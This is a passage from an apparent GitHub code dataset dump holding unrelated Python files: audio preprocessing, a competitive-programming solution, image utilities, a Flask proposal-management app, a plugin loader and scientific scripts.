the bottom in image\n img = 255 - img # invert. make black==more energy\n\n # save as jpg\n skimage.io.imsave(out, img)\n\n # ignore _background_noise_ folder and _FedTuning\n if data_dir.startswith(\"_\"):\n continue\n\n data_dir_path = os.path.join(root_dir, data_dir)\n wav_files = glob.glob(os.path.join(data_dir_path, \"*.wav\"))\n\n for wav_file in wav_files:\n wav_file_split = re.split('[/_\\.]', wav_file)\n\n user_id = wav_file_split[-4]\n # e.g., bird_nohash_0.jpg\n image_out_filename = (wav_file_split[-5] + '_'\n + wav_file_split[-3] + '_'\n + wav_file_split[-2] + '.jpg')\n\n n_mels = 64\n n_time_steps = 63\n hop_length = 256\n\n y, sr = librosa.load(wav_file, sr=16000)\n y = np.concatenate((y[:n_time_steps * hop_length], [0] * (n_time_steps * hop_length - len(y))))\n\n # main workload\n if user_id in user_train_dict:\n user_dir = os.path.join(dataset_fedtuning_dir, 'train', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n elif user_id in user_valid_dict:\n user_dir = os.path.join(dataset_fedtuning_dir, 'valid', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n else:\n user_dir = os.path.join(dataset_fedtuning_dir, 'test', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n\nprint('Done!')\n","repo_name":"dtczhl/FedTuning","sub_path":"Dataset/speech_command/speech_command_preprocess.py","file_name":"speech_command_preprocess.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34200525769","text":"import sys\nfrom collections import deque, Counter\nsys.setrecursionlimit(5 * 10 ** 5)\n# from pypyjit import set_param\n# set_param('max_unroll_recursion=-1')\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\n\n\n\ndef solve(N: int):\n e = N\n s = 1\n while True:\n if e-s <= 1:\n break\n h = (e+s)//2\n print(f\"? {h}\", flush=True)\n ret =ii()\n if ret ==0:\n s = h\n else:\n e = h\n print(f'! {s}')\n\ndef main():\n N = ii() # type: int\n solve(N)\n return\n\nmain()\n","repo_name":"masahiro-999/atcoder-workspace","sub_path":"abc299/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39286861163","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nmodul: utils for skin cancer py\r\nmodul author: Christoph Doerr\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport shutil\r\nimport os.path\r\nimport os\r\nfrom pathlib import Path\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ndef identify_duplicates(x, metadata):\r\n \"\"\" Identify melanom id with multple images\r\n Input metadata: pandas data series \r\n \"\"\"\r\n unique_list = list(metadata)\r\n \r\n if x in unique_list:\r\n return 'no_duplicates'\r\n else:\r\n return 'has_duplicates'\r\n \r\ndef identifyValidationRows(x, metadata_val):\r\n \"\"\" Identify Rows that represent validation data\r\n Input metadata_val: pandas data series of validation data\r\n \"\"\"\r\n val_list = list(metadata_val)\r\n \r\n if str(x) in val_list:\r\n return 'val'\r\n else:\r\n return 'train'\r\n \r\ndef copyImagetoLabelFolder(metadata, metadata_train, metadata_val, figure_path, train_dir, val_dir):\r\n \"\"\"Set up training directories with images\r\n Input metadata_train: pandas data series of training data\r\n Input metadata_val: pandas data series of validation data\r\n Input figure_path: general image directory \r\n Input train_dir: training directory\r\n Input val_dir: validation directory\r\n \"\"\"\r\n print('Copying images ...')\r\n train_list = list(metadata_train['image_id'])\r\n val_list = list(metadata_val['image_id'])\r\n metadata.set_index('image_id', inplace=True)\r\n for image_id in train_list: \r\n fname = image_id + '.jpg'\r\n label = metadata.loc[image_id,'dx']\r\n src = '{}{}'.format(figure_path, fname)\r\n dst = '{}{}/{}'.format(train_dir, label, fname)\r\n shutil.copyfile(src, dst)\r\n for image_id in val_list: \r\n fname = image_id + '.jpg'\r\n label = metadata.loc[image_id,'dx']\r\n src = '{}{}'.format(figure_path, fname)\r\n dst = '{}{}/{}'.format(val_dir, label, fname)\r\n shutil.copyfile(src, dst)\r\n print('... done copyint images !!!')\r\n\r\ndef dataAugmentation(class_list, data_path, train_dir, total_number_images=6000, target_size=(224,224), batch_size=50):\r\n '''\r\n Input class_list: list with class names\r\n Input data_path: general data directory\r\n Input train_dir: training directory\r\n Input total_number_images: total number of images that shall be created\r\n Input target_size: target size of image augmentatin\r\n Input batch_size: batch size of imaage augmentation\r\n '''\r\n print('Augmenting images ...')\r\n for img_class in class_list:\r\n print('Creating data for {} label'.format(img_class))\r\n aug_dir = '{}aug_dir/{}'.format(data_path, img_class)\r\n Path(aug_dir).mkdir(parents=True, exist_ok=True)\r\n img_dir = os.path.join(aug_dir, 'img_dir')\r\n Path(img_dir).mkdir(parents=True, exist_ok=True)\r\n img_list = os.listdir(train_dir + img_class) \r\n for fname in img_list:\r\n src = os.path.join(train_dir + img_class, fname)\r\n dst = os.path.join(img_dir, fname)\r\n shutil.copyfile(src, dst) \r\n datagen = ImageDataGenerator(\r\n rotation_range=180,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1,\r\n zoom_range=0.1,\r\n horizontal_flip=True,\r\n vertical_flip=True,\r\n #brightness_range=(0.9,1.1),\r\n fill_mode='nearest')\r\n aug_datagen = datagen.flow_from_directory(aug_dir,\r\n save_to_dir=train_dir + img_class,\r\n save_format='jpg',\r\n target_size=target_size,\r\n batch_size=batch_size) \r\n num_files = len(os.listdir(img_dir))\r\n num_batches = int(np.ceil((total_number_images-num_files)/batch_size))\r\n for i in range(0,num_batches):\r\n imgs, labels = next(aug_datagen) \r\n shutil.rmtree(aug_dir) \r\n print('... done augmenting images !!!')\r\n\r\ndef checkDataVolume(path):\r\n \"\"\" Train Model\r\n Input model: defined model\r\n Input X_train: training data\r\n Input Y_train: training labels\r\n Input X_train: test data\r\n Input Y_train: test labels\r\n Return model: trained model\r\n Return history: training history\r\n \"\"\"\r\n print(len(os.listdir('{}nv'.format(path))))\r\n print(len(os.listdir('{}mel'.format(path))))\r\n print(len(os.listdir('{}bkl'.format( path))))\r\n print(len(os.listdir('{}bcc'.format( path))))\r\n print(len(os.listdir('{}akiec'.format( path))))\r\n print(len(os.listdir('{}vasc'.format( path))))\r\n print(len(os.listdir('{}df'.format( path))))","repo_name":"chrisy-d1989/skin_cancer","sub_path":"utils_skincancer.py","file_name":"utils_skincancer.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"639644617","text":"f = open(\"RCV_Tri\",\"w\")\n\nwords = open( \"RCV-Tri2\", \"r\" ).readlines()\nimport re;\nfor t in words:\n\tt = t.strip('(')\n\tt = t.replace(')','')\n\tm = t.split(',')\n\tmt = m[0]\n\tf.write(mt[1:-3] + \" : \" + m[1])\t\nf.close()","repo_name":"karenke/NLP","sub_path":"LM/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29248655486","text":"from unittest.mock import MagicMock, patch\n\nfrom django.test import TestCase\nfrom bs4 import BeautifulSoup\n\nfrom core.scrapping import PortalScrapper\n\n\nclass PortalScrapperTests(TestCase):\n def test_init_error(self):\n self.assertRaises(TypeError, PortalScrapper)\n\n @patch('core.scrapping.request_page', return_value=MagicMock(content='oi'))\n def test_load_soup(self, mocked_request_page):\n self.assertIsInstance(mocked_request_page, MagicMock)\n mock = MagicMock(url='http://www.google.com.br/', load_soup=PortalScrapper.load_soup)\n mock.load_soup(mock)\n self.assertIsInstance(mock.page, BeautifulSoup)\n mocked_request_page.assert_called_once_with('http://www.google.com.br/')\n","repo_name":"rodrigondec/rctech","sub_path":"core/tests/test_portal_scrapper.py","file_name":"test_portal_scrapper.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74044717479","text":"import numpy as np\nfrom numpy.random import rand\n\nfrom dwave.system.samplers import DWaveSampler\nfrom dwave.system.composites import EmbeddingComposite\nfrom minorminer import find_embedding\nimport networkx as nx\nimport dwave.inspector\n\ndim=50\nQ = 2*rand(dim,dim) - 1\nQ = (Q+Q.T)/2\nfor k in range(dim):\n Q[k,k] = np.abs(Q[k,k])\n\nprint(Q)\n\nlinear={('a'+str(k), 'a'+str(k)):Q[k][k] for k in range(dim)}\n\nquadratic={('a'+str(i+1), 'a'+str(j)):Q[i+1][j] for i in range(dim-1) for j in range(dim-1) if j= 0 and r < N and c >= 0 and c < N and map[r][c].isdigit()\n\nfor row in range(N):\n for col in range(N):\n if map[row][col] == '.':\n answer = 0\n for move in MOVE:\n [dr, dc] = move\n if isBoom(row+dr, col+dc):\n answer += int(map[row+dr][col+dc])\n print('M', end='') if answer >= 10 else print(answer, end='')\n else:\n print('*', end='')\n print()","repo_name":"Handonggon/coding_test","sub_path":"백준/Silver/1996_지뢰 찾기/hdg.py","file_name":"hdg.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6170688191","text":" # Enumurate\n# Enumurate is a function that returns a tuple containing a count/index (from start which defaults to 0)\n# and the values obtained from iterating over sequence:\n\n \na = [21,23,24,25,53,56,56,87,9,90,76]\n\nfor m in enumerate (a): # tupe containing two numbers will store in m.\n print(m)\n break\n\n\n \nfor i, m in enumerate (a): # tuple khul jay ga, aur donon values i aur m mein chali jaein gi\n if (i == 4):\n print(m)\n break\n \n\n ","repo_name":"mahsanshoaib1/python-a-complete-guide","sub_path":"day_18.py","file_name":"day_18.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71428159719","text":"import json\nimport os\nimport shutil\nfrom datetime import datetime\n\nimport pypandoc\nfrom flask import render_template, redirect, request, url_for, g, flash, send_from_directory, Response\nfrom flask_babel import _, get_locale\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import secure_filename\n\nfrom app import db\nfrom app.custom_libs.highcharts_lib import to_highchart, to_gantt_highchart, to_map_highchart\nfrom app.custom_libs.print_lib import ProposalText\nfrom app.custom_libs.tables_lib import get_WP_table, get_budget_table, get_WPeffort_table, \\\n get_proposal_deliverable_table, \\\n get_proposal_milestone_table\nfrom app.custom_libs.trello_lib import send_proposal_to_trello\nfrom app.custom_libs.utilities_lib import add_admin_user, add_proposal_statuses, requires_access_level, role_required, \\\n color_diff, create_folder, make_tree\nfrom app.main import bp\nfrom app.main.forms import ProposalForm, ParticipantForm, UserPermissionForm, \\\n UploadForm\nfrom app.models import Proposal, Company, ProposalStatus, date_format, ACCESS, User, ROLES\n\n\n@bp.app_template_filter()\ndef show_diff_table(change):\n diff = color_diff(change)\n return '

    ' + ''.join(diff) + '

    '\n\n\n@bp.before_app_request\ndef before_request():\n g.user = current_user\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n g.locale = str(get_locale())\n add_admin_user()\n add_proposal_statuses()\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n proposals = Proposal.query.all()\n return render_template('index.html', title=_('Home'), proposals=proposals)\n\n\n# Proposal\n\n@bp.route('/add_proposal', methods=['GET', 'POST'])\n@login_required\n@requires_access_level(ACCESS['admin'])\ndef add_proposal():\n form = ProposalForm(request.form)\n if form.validate_on_submit():\n data = request.form.to_dict()\n date_obj = datetime.strptime(data['start_date'], date_format)\n proposal = Proposal(acronym=data['acronym'], title=data['title'], description=data['description'],\n budget=data['budget'], indirect_costs_rate=int(data['indirect_costs_rate_percent']) / 100,\n call=data['call'], start_date=date_obj, duration_months=data['duration_months'],\n topic=data['topic'],\n status=ProposalStatus.get_status(data['status']), action_type=data['action_type'])\n flash_message = 'Your proposal has been added!'\n try:\n db.session.add(proposal)\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! {inst}'\n flash(flash_message)\n proposal.add_user(current_user, role=ROLES['responsible'])\n return redirect(url_for('main.index'))\n return render_template('quick_form.html', title='Add Proposal', form=form)\n\n\n@bp.route('//dashboard', methods=['GET'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef dashboard(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n series, series_drilldown = proposal.serialise_budget()\n chart = to_highchart(graphtype='pie', series=series, series_drilldown=series_drilldown, title='Budget Shares',\n subtitle='Click the slices to view the budget detail')\n wp_table = get_WP_table(proposal_acronym)\n effort_table = get_WPeffort_table(proposal_acronym)\n budget_table = get_budget_table(proposal_acronym)\n deliverables_table = get_proposal_deliverable_table(proposal_acronym)\n milestones_table = get_proposal_milestone_table(proposal_acronym)\n gantt = to_gantt_highchart(proposal.get_gantt_data(), 'Gantt Chart')\n map = to_map_highchart(proposal.get_map_data(), 'Participants Geographical Distribution')\n tree = make_tree(create_folder(proposal_acronym))\n return render_template('dashboard.html', proposal=proposal, chart=chart, gantt=gantt, wp_table=wp_table,\n budget_table=budget_table, effort_table=effort_table, deliverables_table=deliverables_table,\n milestones_table=milestones_table, map=map, tree=tree)\n\n\n@bp.route('//edit', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef edit_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = ProposalForm(request.form, obj=proposal)\n if form.validate_on_submit():\n data = request.form.to_dict()\n proposal.update(data)\n flash_message = 'Your proposal has been modified successfully!'\n try:\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! {inst}'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Edit Proposal', form=form)\n\n\n@bp.route('//delete', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['admin'])\n@login_required\ndef delete_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n folder = create_folder(proposal_acronym)\n shutil.rmtree(folder, ignore_errors=True)\n proposal.delete()\n flash_message = 'Your proposal has been deleted!'\n try:\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! {inst}'\n flash(flash_message)\n\n\n# Exporting\n\n@bp.route('//export', methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef export_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n if request.args:\n format = request.args['format']\n else:\n format = ''\n text = ProposalText(proposal)\n filename = text.write_description()\n new_filename = os.path.splitext(filename)[0] + f'.{format}'\n pypandoc.convert_file(filename, format, outputfile=new_filename)\n os.remove(filename)\n return send_from_directory(directory=os.path.dirname(new_filename), filename=os.path.basename(new_filename),\n as_attachment=True)\n\n\n# Participants\n\n\n@bp.route('//add_participant', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef add_participant(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = ParticipantForm.new(obj=None)\n d_temp = {'y': True, 'n': False}\n if form.validate_on_submit():\n data = request.form.to_dict()\n if 'is_coordinator' not in data:\n data['is_coordinator'] = 'n'\n proposal.add_participant(Company.get_company_acronym(data['participant']),\n personnel_cost=data['personnel_cost'],\n subcontracting_cost=data['subcontracting_cost'],\n is_coordinator=d_temp[data['is_coordinator']],\n participant_number=data['participant_number'],\n other_direct_costs=data['other_direct_costs'],\n proposal_related_text=data['proposal_related_text'])\n flash_message = 'The proposal has been correctly modified!'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Add Participant', form=form)\n\n\n@bp.route('//edit_participant/', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef edit_participant(proposal_acronym, company_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n participant = proposal.get_participant(Company.get_company_acronym(company_acronym))\n form = ParticipantForm.new(obj=participant, company=participant.company)\n d_temp = {'y': True, 'n': False}\n if form.validate_on_submit():\n data = request.form.to_dict()\n if 'is_coordinator' not in data:\n data['is_coordinator'] = 'n'\n proposal.add_participant(Company.get_company_acronym(data['participant']),\n personnel_cost=data['personnel_cost'],\n subcontracting_cost=data['subcontracting_cost'],\n is_coordinator=d_temp[data['is_coordinator']],\n participant_number=data['participant_number'],\n other_direct_costs=data['other_direct_costs'],\n proposal_related_text=data['proposal_related_text'])\n flash_message = 'The proposal has been correctly modified!'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Add Participant', form=form)\n\n\n@bp.route('//remove_participant/', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef remove_participant(proposal_acronym, company_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n proposal.remove_participant(Company.get_company_acronym(company_acronym))\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n# Users\n\n@bp.route('//add_user', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef add_user(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = UserPermissionForm.new()\n if form.validate_on_submit():\n data = request.form.to_dict()\n proposal.add_user(User.query.filter_by(username=data['user']).first(), role=int(data['role']))\n flash_message = 'The user has been correctly added to the proposal!'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Add User', form=form)\n\n\n@bp.route('//remove_user/', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef remove_user(proposal_acronym, username):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n proposal.remove_user(User.query.filter_by(username=username).first())\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n# Files\n\n@bp.route(\"//downloads/\", methods=['GET', 'POST'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef get_file(proposal_acronym, filename):\n \"\"\"Download a file.\"\"\"\n folder = create_folder(proposal_acronym)\n return send_from_directory(directory=folder, filename=filename, as_attachment=True)\n\n\n@bp.route(\"//delete/\", methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef delete_file(proposal_acronym, filename):\n \"\"\"delete a file.\"\"\"\n folder = create_folder(proposal_acronym)\n if os.path.exists(os.path.join(folder, filename)):\n os.remove(os.path.join(folder, filename))\n flashmessage = f'the file \"{filename}\" has been deleted'\n else:\n flashmessage = f'the file \"{filename}\" does not exist'\n flash(flashmessage)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal_acronym))\n\n\n@bp.route(\"//upload\", methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef upload_file(proposal_acronym):\n folder = create_folder(proposal_acronym)\n form = UploadForm()\n if form.validate_on_submit():\n if request.method == 'POST':\n # check if the post request has the file part\n f = form.submitted_file.data\n filename = secure_filename(f.filename)\n uploaded_file = os.path.join(folder, filename)\n f.save(uploaded_file)\n flash_message = 'File correctly submitted'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal_acronym))\n return render_template('quick_form.html', title='Submit File', form=form)\n\n\n# Changelog\n\n@bp.route('//restore_version/', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef restore_proposal_version(proposal_acronym, version_index):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n version = proposal.versions[int(version_index)]\n version.revert()\n db.session.commit()\n flash_message = f'Proposal Restored to version {version_index}'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n@bp.route(\"//changelog\", methods=['GET', 'POST'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef proposal_changelog(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n return render_template('changelog.html', proposal=proposal)\n\n\n### Trello\n@bp.route(\"//totrello\", methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef submit_to_trello(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n ## Execute in thread - currently not working for db problem\n # user = User.query.filter_by(username=current_user.username).first()\n # Thread(target=execute_send_trello,\n # args=(current_app._get_current_object(), proposal, user)).start()\n if current_user.trello_token and current_user.trello_api_key:\n message=send_proposal_to_trello(proposal=proposal, user=current_user)\n flash(message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n else:\n flash('Please set your Trello user api key and token')\n return redirect(url_for('main.user_panel', username=current_user.username))\n\n\n\n### Autocomplete\n\n@bp.route('/_autocomplete/', methods=['GET'])\ndef autocomplete(item):\n if item == 'topic':\n return Response(json.dumps(Proposal.get_topics_list()), mimetype='application/json')\n elif item == 'call':\n return Response(json.dumps(Proposal.get_calls_list()), mimetype='application/json')\n","repo_name":"vitofico/proposals-planner","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":14854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6918594272","text":"import os.path\nimport importlib.util\nimport hashlib\nimport sys\nimport traceback\n\nfrom ..errors import InputValidationException\n\n\n__all__ = [\"PythonPluginSystem\"]\n\n\nclass PythonPluginSystem(object):\n \"\"\"\n Loads Python Packages, using entry point discovery or from a custom\n search path. If they manager a top-level 'plugin' attribute, that\n holds a class derived from PythonPluginSystemPlugin, it will be\n registered with its identifier. Once a plug-in has registered an\n identifier, any subsequent registrations with that id will be\n skipped.\n \"\"\"\n\n __validModuleExtensions = (\".py\", \".pyc\")\n\n def __init__(self, logger):\n self.__logger = logger\n self.reset()\n\n def reset(self):\n \"\"\"\n Clears any previously loaded plugins.\n \"\"\"\n self.__map = {}\n self.__paths = {}\n\n def scan(self, paths):\n \"\"\"\n Searches the supplied paths for modules that define a\n PythonPluginSystemPlugin through a top-level `plugin` variable.\n\n Paths are searched right-to-left, but only the first instance of\n any given plugin identifier will be used, and subsequent\n registrations ignored. This means entries to the left of the\n paths list take precedence over ones to the right.\n\n @note Precedence order is undefined for plugins sharing the\n same identifier within the same directory.\n\n @param paths `str` A list of paths to search, delimited by\n `os.pathsep`.\n \"\"\"\n self.__logger.debug(f\"PythonPluginSystem: Searching {paths}\")\n\n for path in paths.split(os.pathsep):\n if not os.path.isdir(path):\n self.__logger.debug(f\"PythonPluginSystem: Skipping as not a directory {path}\")\n\n for item in os.listdir(path):\n itemPath = os.path.join(path, item)\n\n if os.path.isdir(itemPath):\n # The directory could be a package, check for __init__.py\n initFile = os.path.join(itemPath, \"__init__.py\")\n if os.path.exists(initFile):\n itemPath = initFile\n else:\n self.__logger.debug(\n \"PythonPluginSystem: Ignoring as it is not a python package \"\n f\"contianing __init__.py {itemPath}\"\n )\n continue\n else:\n # Its a file, check if it is a .py/.pyc module\n _, ext = os.path.splitext(itemPath)\n if ext not in self.__validModuleExtensions:\n self.__logger.debug(\n f\"PythonPluginSystem: Ignoring as its not a python module {itemPath}\"\n )\n continue\n\n self.__logger.debug(f\"PythonPluginSystem: Attempting to load {itemPath}\")\n\n self.__load(itemPath)\n\n def scan_entry_points(self, entryPointName):\n \"\"\"\n Searches packages for entry points that define a\n PythonPluginSystemPlugin through a top-level `plugin` variable.\n\n @note The order of discovery is determined by `importlib`, only\n the first plugin with any given identifier will be registered.\n\n @param entryPointName `str` The entry point name to search for\n (see: importlib_metadata.entry_points group).\n\n @returns True if entry point discovery is possible, False if\n there was a problem loading importlib_metadata.\n \"\"\"\n\n # We opt to use the backport implementation of modern importlib to avoid\n # needing to support 3+ code paths to cover Python 3.7 to 3.10. It is\n # made available for 3.7 onwards (for now, at least).\n # Pip installs should have this module available, but other methods may not,\n # so be tolerant of it being missing.\n try:\n import importlib_metadata # pylint: disable=import-outside-toplevel\n except ImportError:\n self.__logger.warning(\n \"PythonPluginSystem: Can not load entry point plugins as the importlib_metadata \"\n \"package is unavailable.\"\n )\n return False\n\n self.__logger.debug(\n f\"PythonPluginSystem: Searching packages for '{entryPointName}' entry points.\"\n )\n\n for entryPoint in importlib_metadata.entry_points(group=entryPointName):\n self.__logger.debug(f\"PythonPluginSystem: Found entry point in {entryPoint.name}\")\n try:\n module = entryPoint.load()\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\n f\"PythonPluginSystem: Caught exception loading {entryPoint.name}:\\n\"\n + traceback.format_exc()\n )\n continue\n\n if not hasattr(module, \"plugin\"):\n self.__logger.error(\n f\"PythonPluginSystem: No top-level 'plugin' variable {module.__file__}\"\n )\n continue\n\n self.register(module.plugin, module.__file__)\n\n return True\n\n def identifiers(self):\n \"\"\"\n Returns the identifiers known to the plugin system.\n\n If @ref scan has not been called, then this will be empty.\n\n @return `List[str]`\n \"\"\"\n return list(self.__map.keys())\n\n def plugin(self, identifier):\n \"\"\"\n Retrieves the plugin that provides the given identifier.\n\n @return @ref openassetio.pluginSystem.PythonPluginSystemPlugin\n \"PythonPluginSystemPlugin\"\n\n @exception errors.InputValidationException Raised if no plugin\n provides the specified identifier.\n \"\"\"\n\n if identifier not in self.__map:\n msg = \"PythonPluginSystem: No plug-in registered with the identifier '%s'\" % identifier\n raise InputValidationException(msg)\n\n return self.__map[identifier]\n\n def register(self, cls, path=\"\"):\n \"\"\"\n Allows manual registration of a PythonPluginSystemPlugin derived\n class.\n\n This can be used to register plugins using means other than\n the built-in file system scanning.\n\n @param cls @ref openassetio.pluginSystem.PythonPluginSystemPlugin\n \"PythonPluginSystemPlugin\"\n\n @param path `str` Some reference to where this plugin\n originated, used for debug messaging when duplicate\n registrations of the same identifier are encountered.\n \"\"\"\n identifier = cls.identifier()\n if identifier in self.__map:\n self.__logger.debug(\n f\"PythonPluginSystem: Skipping class '{cls}' defined in '{path}'. \"\n f\"Already registered by '{self.__paths[identifier]}'\"\n )\n return\n\n self.__logger.debug(f\"PythonPluginSystem: Registered plug-in '{cls}' from '{path}'\")\n\n self.__map[identifier] = cls\n self.__paths[identifier] = path\n\n def __load(self, path):\n \"\"\"\n Loads the specified python file and registers it's plugin.\n The file must expose a top-level 'plugin' variable.\n\n @param path `str` This can be either a single-file module,\n or the __init__.py at the root of a package.\n \"\"\"\n\n # Make a unique namespace to ensure the plugin identifier is\n # all that really matters\n moduleName = hashlib.md5(path.encode(\"utf-8\")).hexdigest()\n\n try:\n spec = importlib.util.spec_from_file_location(moduleName, path)\n if spec is None:\n raise RuntimeError(\"Unable to determine module spec\")\n\n module = importlib.util.module_from_spec(spec)\n\n # Without this, for package imports we get:\n # 'No module named ''\n sys.modules[spec.name] = module\n\n spec.loader.exec_module(module)\n\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\n f\"PythonPluginSystem: Caught exception loading {path}:\\n\" + traceback.format_exc()\n )\n return\n\n if not hasattr(module, \"plugin\"):\n self.__logger.error(f\"PythonPluginSystem: No top-level 'plugin' variable {path}\")\n return\n\n # Store where this plugin was loaded from. Not entirely\n # accurate, but more useful for debugging than it not being\n # there.\n module.plugin.__file__ = path\n\n self.register(module.plugin, path)\n","repo_name":"OpenAssetIO/OpenAssetIO","sub_path":"src/openassetio-python/package/openassetio/pluginSystem/PythonPluginSystem.py","file_name":"PythonPluginSystem.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"18"} +{"seq_id":"1998581498","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 25 14:23:21 2020\n\n@author: aklimasewski\n\nread in NGA data and calculate 4 base gmpe average\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom base_gmpe import gmpe_avg\nimport sys\nimport os\nsys.path.append(os.path.abspath('/Users/aklimasewski/Documents/python_code_nonergodic'))\nfrom preprocessing import transform_dip\n\ndef saveNGAtargets(filename = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'):\n '''\n \n Parameters\n ----------\n filename: name of NGA file\n\n Returns\n saves filtered data in csv\n '''\n \n from base_gmpe import gmpe_avg\n \n # filename = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'\n dfnga = pd.read_csv(filename,index_col=0)\n \n periodnames = ['T10.000S','T7.500S','T5.000S','T4.000S','T3.000S','T2.000S','T1.000S','T0.200S','T0.500S','T0.100S']\n residtesttemp=dfnga.loc[:, periodnames]\n nga_GM=residtesttemp.values\n 